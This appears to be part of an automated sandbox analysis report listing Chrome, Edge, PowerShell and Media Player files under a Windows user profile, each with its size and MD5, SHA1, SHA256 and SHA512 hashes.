Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
605bcb589b72e2900a766463d8c3682f

SHA1
73b4ec7613a95166bc66dfdb0cf1210e1ac6502a

SHA256
2fb2a6cb8c8adca6c11645d7753e997e25c18ee238e011f8f2552c83fbea8b10

SHA512
997297da6d028f2f7c2c36a7ec17eb768c8a3ac3275fa776ae0e635482a2b4e25291fe31bfe9b1bc95070f7151979d5e82aa3fde94c2f408a427ef95adea0bbd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
864B

MD5
d3521bb7c4e226d8d10e3b1db9c4705f

SHA1
edfbcf99647c2b649b79132b584a66c955163c6c

SHA256
ba889a9d7f8084cfc9d4f4d7cf246462c5e0962244773965b7b956e60c10f960

SHA512
5345e7bf57539fb6f384eb9828a4fdbda482b5f1b65a59cc41bb882704c54fdcddd5c97d72af4d846f31c17fcca99de995db4e4e805cdb21af7aca4be1d58d6f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
8KB

MD5
5d63287609b26220b7e7a90acd16cf57

SHA1
a41eb60899a0e405a989654ad45cd33b1c918319

SHA256
03679ae2842585b51ef05b0e0adb4e9cc41dae8f22707dcbc6e446e8fb602e35

SHA512
154b908e92f27b5975e81fb0ab66e62e22f2cd3f2215159e1b46273062bfcfe82a96dbe4d8f3e30d437ce5f1b8843988d78cac9894eb50086c68a2ed87e27bf6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
de948fcbd161f4274a8039ee71110606

SHA1
997a259125ddd582e093ed4803aaecdd506864e5

SHA256
c8b18c1ed9ed6876abd24f1526c7499f4222fde6b20980074fd59b26a0dcd988

SHA512
21fcf87da0744a4e6179113d189bd10b2d80ba5344ece748a42fc369978fb9ab7b659e756032f92b045eaab13f5c27159ab23600b5e8917c77f5d80a5f194ea6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
cb1b0ad72d2cbd7ca2b4694b09969594

SHA1
cc8b65ab8334dab4207e2a89cdcced12010ee733

SHA256
19879ef06bd82c5ca7e84852a3abe988dd446e779b66808dc930217c6361f756

SHA512
30f0aafdf440a7093808d2b53b6eb4cd831b9e5242ce868c593dd550f493ffd26936a52b92ec7c7c3f49c98eb834dcc7cf3f8b05526bdbab099f545a5c03c09f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
46a50b2b332c30087f31e19915695e8f

SHA1
1876461f72d271ebef61684b227415e9fb51248a

SHA256
fab48093e465b7d06a32fa78e1b9b27173e52a72bd170fbc7121a094f177ed8a

SHA512
9b568a8efdf99c452147ddf84e7ed85a7afb6a976c5932b0feb89dc40098e79c00ac4108ca69e93aa005052bca766bf21f0633cbc429273af41eb11941d49f41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
6e789da1c6f56e86e2961a9fbd030081

SHA1
b605d9ee67018a766cb243b641c354dff948e80a

SHA256
d2e5315402099f0ee7b4797d04b8198806a92652dccee4bd2574b1e7f8b5f39a

SHA512
a3b337745f74c357595fb79fcef399e6c8d866c8b6d16322c7017e2aa0d995076098777ab93bb57e17249aa34ebc3bf11f7b0d3280494c2f7ffc8d72d984b795

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
13KB

MD5
20649c88abc5b86a92e596f82e318f3c

SHA1
827bd77baeedafb7a1bb1913980006f319c715fe

SHA256
bd2392417c35349a1798326493e89bbd0420a0ae6e8705d5707739dabbf21f20

SHA512
24ef3c23291357ed541f1a692e2935b1b078d6b5b9c950ca0775d46a5b2c149896fdac788e5c73a3fb287d2b21ff0255a7df9d5d25961e76764b950b4c4507f0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\db6345a0-9f2a-429d-9f54-58cebc120a89\index-dir\the-real-index

Filesize
2KB

MD5
59e2f53851986adb7a243ac0aa1f941c

SHA1
593667ef41595a67e6735b40858df2c4290e62a8

SHA256
c261bfc41b2f6339e89f76da5bb439f7dea2e3400f17a92d212842cdefe0a4bf

SHA512
88f96c40b65c80ff9765ef7b45590a95d7fbb852bf18bb3609127ed97c29838b6ca35f4bdde5eb2682c10af45a95febd8ee34369378704cd563f34ee35fbfbce

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\db6345a0-9f2a-429d-9f54-58cebc120a89\index-dir\the-real-index~RFe5ac005.TMP

Filesize
48B

MD5
0bf78c1c8399aae0148f3a7fca8b04d9

SHA1
20dbdb7e0002ff1eec3ea23c4d841df752170a4d

SHA256
c580414a1597b2d383c47e5a7f5e45aff522245a2aad4d75091424c59096db2c

SHA512
7352b0fca668fc34948158b96a0bc5d06fd365c280715465e0d7bf879ba7264ab143eeaa7169a2544c7afb19a78fe72315899b9c582252663f00347ee5f55fd8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\f00df887-9503-4baa-96c7-fa4afcfb87bc\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
b85bc8d054373b2a2fa1dc2143a6f559

SHA1
6aab6e5678747b83da572ae0e9128a9a7c1c52fe

SHA256
239f946a27eb12a8ff11cb2d7e48e959a1d23a1a4d664daec7c6c1ae9ab14747

SHA512
c0956496b56c9b3c1222720e145bf775543a13716f93c3eb7ce81c67f50a43e67f9ef607d49e60d6bf85e5cea30368c8d8220b7148e33231195b3a41082fd428

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
9559d0ad1ad3f3501fde4796d574731f

SHA1
f486fe0612ca130eb4a1ab76e2317cde73785ecd

SHA256
9a1763b75dfebe2f69a9a8f623892bfe1760e66c142a06d58d36cd9752826a06

SHA512
516e4a7e663745bada8a66d5d97067ed92391c9ad29f95ace587a54c1b0cd287a550d96997ef392dac20012b1c720638506da9a93ade61db25f83b787e9118b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
56B

MD5
94275bde03760c160b707ba8806ef545

SHA1
aad8d87b0796de7baca00ab000b2b12a26427859

SHA256
c58cb79fa4a9ade48ed821dd9f98957b0adfda7c2d267e3d07951c2d371aa968

SHA512
2aabd49bc9f0ed3a5c690773f48a92dbbbd60264090a0db2fe0f166f8c20c767a74d1e1d7cc6a46c34cfbd1587ddb565e791d494cd0d2ca375ab8cc11cd8f930

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
119B

MD5
10edae44271e940428e4057b9bf7e47a

SHA1
8d25a1cb2aa169855330791c1fa7801657962d7a

SHA256
508a6c07d934d2ecf8c11fd6cb5c7bd76d7d18e99bde2add25a090fca73561fa

SHA512
3524674eb8ce2cd222a9afd845ac248faad465969a212a2726a867c45dad956e0cb0f1ed9ce71c9b735c80aa6e5cefb4ba0a1a32d5d4c971d7828662d0256380

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
176B

MD5
52dd81f23268e83f9769f6e37947b90e

SHA1
e102351229eed010871c25c479de1497ffc6b3be

SHA256
7abb7cfecf2bcfa0757abc155951329605285ae4fdb79c5567fd234fed970f25

SHA512
32f4cae2450c9a876d1c8672545080e5758cf482144aae6240c763c3cd328107ecdeec832ce7eabb771a7c12dbc3320fe5e1d0cf2d5d62e777214e253e1e26d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
112B

MD5
8dcf8f61071a8b6bd7c9851cbd20f5fd

SHA1
d509125ba280d74bfd9d91ec79aa67d74fb1ae65

SHA256
39eaf5dd807a53636cdb7c91c15585952a8ac22d8a4adfd0e35574503e516dce

SHA512
6f0fa2f92082c16dbf9649b7848e6935c8d9743946c21e797d2330ae3da4e50fd7eb3469bb68edaabf3d229bac0407f315368527c0176a33b2a9a05ad729ff1a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a8ce0.TMP

Filesize
119B

MD5
74e474700832e8d5e02318a44911333e

SHA1
85d31049daa82b117c2c9d8680299cf3fa3abfbe

SHA256
3591e7dde5e4fd169072b185de832cb4f9b219d3a5f334d56f1befd4715db630

SHA512
52b054194f10184d8b9ecb216a41be593490bed5896860f2d533ffb3aca5c4ac2f4c1393a43abadbbfcbf35141715b2a18dfd8601cd65243da0eb4f97b7d3f9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
120B

MD5
1a2dbf9497e1372eeefbecc75a5cbaff

SHA1
2f191048355c23e301d301f011363a82cd5456cb

SHA256
ff9d496f3cd95db602c92da9f8f49cc33c1a0a8db24cd9c5838cd32622309e72

SHA512
8a8517ff9b541f431b614bfbdbdd56f201d6e915b3868830194b6f3f5ae4fe64ab160478aa495523d62e6db36b3f6f571f9ca722ddd0b1bf28cab755f36d911f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png

Filesize
1001B

MD5
9b4d2aa85bae2b94477371dba6544b2a

SHA1
4dd2d97aa25b2723a91016ee5b403619e7a4eb99

SHA256
3af45701fd97bc8ae6ae8e9f999d5d8b9d61a9a7914faf6518450f454e884223

SHA512
f6351c370d91a87a2b0abd8da8460e65a8149700beff2e819074004101133e750b1e60ecdf6ead73d1de19f37258e7853084d65c6adfeab8707c480d9caabc93

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2940_131615982\Icons Monochrome\16.png

Filesize
214B

MD5
1b3a4d1adc56ac66cd8b46c98f33e41b

SHA1
de87dc114f12e1865922f89ebc127966b0b9a1b7

SHA256
0fb35eacb91ab06f09431370f330ba290725119417f166facaf5f134499978bd

SHA512
ce89a67b088bae8dcd763f9a9b3655ed90485b24646d93de44533744dfcf947c96571e252d1ad80bdec1530ff2b72b012e8fff7178f1b4e957090f0f4c959e0d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2940_570382888\Shortcuts Menu Icons\Monochrome\0\512.png

Filesize
2KB

MD5
206fd9669027c437a36fbf7d73657db7

SHA1
8dee68de4deac72e86bbb28b8e5a915df3b5f3a5

SHA256
0d17a989f42bc129aca8e755871a7025acb6292ce06ca2437e95bedbc328fa18

SHA512
2c89878ec8466edf1f214d918aefc6a9b3de46d06ffacff4fdb85566560e94068601b1e4377d9d2eabefdc1c7f09eb46b00cf4545e377cc84a69edf8e57e48b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\scoped_dir2940_570382888\Shortcuts Menu Icons\Monochrome\1\512.png

Filesize
10KB

MD5
529a0ad2f85dff6370e98e206ecb6ef9

SHA1
7a4ff97f02962afeca94f1815168f41ba54b0691

SHA256
31db550eb9c0d9afd316dc85cdfd832510e2c48e7d37d4a610c175667a4599c6

SHA512
d00e2d741a0a6321c92a4aab632f8f3bafd33c0e2875f37868e195ed5e7200a647b4c83358edcef5fc7acbc5c57f70410903f39eac76e23e88a342ac5c9c21cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
123KB

MD5
e622a3549f0a08e38a7e9dcee5e623cc

SHA1
4a8fad928feaa15b5a95faef16fe1db3ff5df2e3

SHA256
d2ac44eda28041c6bc2f9f3664bb08755258745c4195844b6c3efa808a099b2b

SHA512
2669c12ae692f46f091b721d490842cba03ab50501818bee500a164c8a9d076b280993cd10e9454d5e9bf305a84e3b9f9991c25bb1940ddafe17b1e0328b35a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
246KB

MD5
c4f32a76d0a5d508eb8c47e2b17eb5cb

SHA1
5b6334d89eab98828a0b248ee713171922feb8b3

SHA256
b9993916d6b80d4985bcf94e496488817843a8aafeafbed2a99aace593c1cf94

SHA512
e5a962a4f1d69c6a2b5c92547c19f75d1c88b66e40f7734f77d7819fb108e2b53ae7ec9e769a5303a051fcf3d54d13e1f1fa09178e0a58652dd620139f1ec09d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
246KB

MD5
da783b21237daecbb19229fedbc54f00

SHA1
f97e14450042ee6c1a00178a4235ce3b7e02d746

SHA256
ab140c8dc7bcdb0fce19168140d5e10190dc0c51ae08cec6fb91668d177bd753

SHA512
8b85e0b4dd2500a92bd04c6ed0b0be805887c05813f747d5ad4e2bbfe868fbc87f47f406f3788e1d38e892b0c59ccd27c3dcade12a0491c5d87e5b7d6159586e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f09c5037ff47e75546f2997642cac037

SHA1
63d599921be61b598ef4605a837bb8422222bef2

SHA256
ba61197fff5ed487084790b869045ab41830bdf6db815503e8e064dd4e4df662

SHA512
280bff6eac4b2b4fe515696223f61531f6b507c4c863ad9eef5ab0b1d65d264eba74fb7c9314b6920922142b8ab7605792211fca11a9a9ef0fc2ae995bf4f473

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
010f6dd77f14afcb78185650052a120d

SHA1
76139f0141fa930b6460f3ca6f00671b4627dc98

SHA256
80321891fd7f7c02dd4be4e5be09f8e57d49e076c750f8deb300be8f600de2d7

SHA512
6e6c9e348e948b946cfb97478698423e1272c4417bc8540e5daa64858e28be8fda5baf28538aee849f8bb409c17a51c60e48a3f1793e3a86cb27edeb32aa30a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
21KB

MD5
1401e9fee77d1f2ac68382f3e92290d0

SHA1
3016320f4984fc3bea3b64f56900478a7eaecc53

SHA256
1681cf800cad8c704acc3eba63766b2bc724de769092153121f73a34c61f6564

SHA512
a4138eb2b7c6f777dc6b65294a1087501ea4f7ddc082c5455f5998fbee4bc16e28e4d11d0663011cb5889077b2557810a421d6569ab1b796fc94e0e2cd4193d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
fecb8909935cc3fce1bb19e5b78e6876

SHA1
ebf7669d412e090dea4d30667cecca9887db1050

SHA256
aaaac4cb261d92c50e5ba41deeb68b89b63fea3d10f182c97e70a9c2ad2bd08e

SHA512
297f199a7876a88139d51e4f8f0799c19d5104e9c2ed025e0c91a466f6d9912dbb579e99645f24b047c482a0747a8aa0a3154b67115094534d3ce80f185dff8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
6ef03df0cf9153cd6c941af2a2f6619b

SHA1
dfd7bbbef770000f9f8b3b65805f7793f71bcd48

SHA256
61f77c186b5c301f48481878ed4e5c44af2ce443f00eee7129e5058e4bf7efd8

SHA512
b5f4644277efd5b62fa8d5eacd7205efa9d75eccd45e0a12859371f9488679269ad6dd30f848d19058675ff07b56db5ab8b00952f4dc91d698758b084f7fd1a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
940B

MD5
56b84b098d3dea2c6fb809daeaeaccb2

SHA1
f44bcec5a06aa7d8f695f7107762894fc6c2f4f5

SHA256
090c5aa26ef10cf98cf0268a638b092ad74d7e559b4abd0db52ebb30a4f4f3e4

SHA512
c3d616ec975463c68a3a37e5f929831064eb1bef7a3ef2f3264e8b7644994cf4b63e53e401e8173f951e2616194e4fbe4dc95a25886c2be61cf5ebffebe318f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1017B

MD5
54e9c43cc7c9d19caf3a2a0fb1099612

SHA1
a37778560aac0b813d0f569851ed74e4299e88ea

SHA256
00e168b5c6f08b4b3f19bf9213ac30e8fc54552190d7315d7bdd95d6691e788e

SHA512
eedaeb42b52345c045174c607007f655cf6ecd2ad231529df4ed846c49966d528a3224361f12441fc3efd96ec4024a09497448075df06415c558471c10fde59b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c9a63f18e3cdf4ab56ede7b01ba0b317

SHA1
c42c5aef8433f9c7634adde65f9a36988ee0e089

SHA256
564c29e6a02416dc8d8a684c4c570a7443a5f454f16a5c7fb78ef8a9ff4ce666

SHA512
e9a881ced5b1ce24b6d1372c788d4eaf913ee86002218931b946ac969ee071ab8ccd032da79ba9d5fcdb5b7222a16abe9b304d2d76abd814eabcb9f9fdd7d515

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fa2bf40afa6d349e22660ee767c1be4b

SHA1
0ecd2658d040b088dd48c95c32fa1d9002bb72da

SHA256
3b70fb52d304f48bd5468c1d8dd7a9f888b5e78d10a0bf61bc4bce41cfa19910

SHA512
2a374a0386b2a5c09a1735d16bd231a51c5dfc697259b87cf385335046ee0af53a7e72057ce6fc17e5b63c121cbe7b10e73bbdc0763b99f522dc3ced2dc68461

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
cc60a43ed2ead9ee10c32f11bbffad1d

SHA1
3fcbb6a48813538b5f425f749b9215494749d34c

SHA256
c61cfa881a4da019e6abf2bc12677fda48abc4c9c1917a0ba554041464dd7ac3

SHA512
37085c03728ffa51786c5e99a7c7ff29e9fe9b73c6b3baea9311310ee5527365ff0204d95efd8ee344f4650923a38327fea9fd34af2dec45f796f8498cf5e047

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
97e38e294f2e76631e3b4aabeaaa9810

SHA1
116f7e1ecd9740026bfa5705d1f9389fc24f2f75

SHA256
5007f7518846d46fe27cfbaa897aecc7ebb87d8673e0c3be08ab10753c01b163

SHA512
832281e290c891d954ab7dd95d4343c50f5ef6f7e16424220a9d124d08cf67b646e0b344c3a2622cc83176c9a5dd23ac85533b82d38d9bf07796a5eb7b483d5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
dff48e663545886c6d94685f3c3ec02d

SHA1
735ceee29ab6981304ddd5dbca205ffd50bbf8ca

SHA256
64a4c07e325129fa15590088227fa95488c33407a89406a852bc534fd7546b82

SHA512
ca27d775894cdd36c10b55fc0f75114d98d4574c2a2706b5fb89963bb666e8a2e869dd29f8cc680d9ef84501a998a9e2c8b9625a4a62d5df0724ee3f933a56e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
0be76d8116d6272d3c69755b647a69d3

SHA1
a7cd6768734160109d6c1aaa8eb933acab6832d2

SHA256
87dba022c36f559d0975afcd31bd39b4e5999d6c2a2abd3b618bc18d9aa6f9d8

SHA512
d55f92e5db90068574441b5f742e167146dcd6c8aba67e119f1bb64f1753dda6fc9e47124a6beed5ffa68dbda037ef002cae3ef82bc7489e89ad13a789dc28fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2dfeddaafdd01c8f20f207c5372bbe07

SHA1
11d4ac2c11876ad002cbc0c95f06bd73065de9e0

SHA256
afd29f090e38e6842d9c0c97ce9fcab559f9d64510b44eb54eb79ca2f0cb7c63

SHA512
d1982ef14e807f717b1ee9e4df0501a31b5e7a80db10384b30b5cc161a5ed68fafc2220cea85ace7e1e1a8c4be40f3041c01ea16df3e1e5ec4f2efd0bee0c098

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
8af380ef88b7bc5610623ad09da8a3a6

SHA1
3f4e6b400f581df4b161449bb963b4737ae25548

SHA256
c488ec5dce79a937dfd40533496c002a309e3d9ae412f68c668a835898c810bb

SHA512
3427f879a196f33ee9b8fc14922282ce076b0ad1fef4b309b4706afb71cf48ea78d206308afd8c8c2e538311c97d87d8fc99558bc6f35f60f9adce0ad97f40e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
7e4d9f00e290ab5c6befa810d799bec4

SHA1
99cfe948ca212bcf5efed2e5322a0455844168bd

SHA256
a1f0dca486607d2109948ed7478ec41f0f562bdf2b1979bbbcbf687ef365c50e

SHA512
09e90807a1fefb74dc763a6ddbaf6ccd37279bdfc97c4fdb94d22ac0a871f077b6070f5d3c8a8b446d8eaa9ad2af52aa9f049a79d2d45b38d02bbb050028cd41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe589de1.TMP

Filesize
1KB

MD5
5bea23bfdeca2a8a04d1e3f8ca219d74

SHA1
5b64d27210e1ce041d18bc54268b1d665133c89f

SHA256
fdf5a0bf68a3a834119a9b84bcdd73aff44291a1c728d88fc2013a27da0aa71f

SHA512
4c51ff9fca65755b5134eedd4725e10ed23e0be519fb12412f7105a937146367233db17c828bc3ebe614a7e579d5f16e5b37a293f3cd378a5f0d751a31ac4d77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
252bd40b2bc329d52d5ebd5d90224667

SHA1
cbcc9493067328e70aad279568c449078d469c17

SHA256
90be89fc512c0215998bb928a0822cfa54d327e3b718715c05b7eee7374a5233

SHA512
10eb33e40e2d0f0b0fd2a77055d2d8b2e353796121d75063edf781bbdbe116ea79d5b9b36eef1983c2b981416ae2a4ef4957a811cac1bd64ee84aa716bdb6764

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2bfcffe9b9fbda0d161ec1c2910ce8a3

SHA1
212cc563dd74375a33907d696b1fe98258622968

SHA256
7f30f38da8f5e5a6ca5bc27b819e5a6f6321cab80efd2978584481f555260093

SHA512
f602f9be33baf61dd9375847c1d751a5e55aa03272f62e6a8e70e4072ddef7a82ad84d7c3d28f612df46f22c6c10b1ea47875b35f07be4da3daba2f796cc8c7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
fa91bc5eec67bd7ea9d61d20eaec6f03

SHA1
618a2e419b211ea9c7de675bc9bf671a6579cb45

SHA256
bf39ba09c89d7abc0d409a4c69827faba5ff071226c3ee2b2616db536d4f4be5

SHA512
df4a0d1e6a470bd739ad1002758130ad9cda000cd08ec95074d68feb4a6e5c59b21faeb5a9a8755c8a3141997383bbcb6e16a16e0455cae99a6732923986d1b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
256KB

MD5
adbd8353954edbe5e0620c5bdcad4363

SHA1
aeb5c03e8c1b8bc5d55683ea113e6ce1be7ac6e6

SHA256
64eff10c4e866930d32d4d82cc88ec0e6f851ac49164122cae1b27eb3c9d9d55

SHA512
87bf4a2dc4dd5c833d96f3f5cb0b607796414ffee36d5c167a75644bcbb02ab5159aa4aa093ed43abe290481abc01944885c68b1755d9b2c4c583fcccd041fd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
1024KB

MD5
0b13354d5ae8c4c71469299d52016172

SHA1
7422dd1e82e3b0c9f9a58dd9d062d43f0f38d2c9

SHA256
5a5cc0bde9834d3a82f094a54fabe4fd647b35b9f95ca383825cc1b48a5adc9a

SHA512
f385a30d67bf1e06af70947a5094d25ddd4bc03086b2db538fc782891acba5f6b386a890962c50f96bf8c9bce6514d6834e2896e9ca82cbb757b467ccef842fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb

Filesize
68KB

MD5
f5e32d872569e7273159e73ea5d544d7

SHA1
82a17b27a993e3a1828152c0103bb98becc6b577

SHA256
d8c85a7c097bc580f1b1ccaa3194d514ee53cdfe520bc156475bf082f9e11c89

SHA512
b8f3dde9a39233f353bd1738a6a8d22a7d8d574feaf64a38e1fd64d590ec86f5f74c06f40f8ff1112e395c5058ca09cfdfe3b7a34fd9bb4fb4bf2954c2692f42

Download Submit
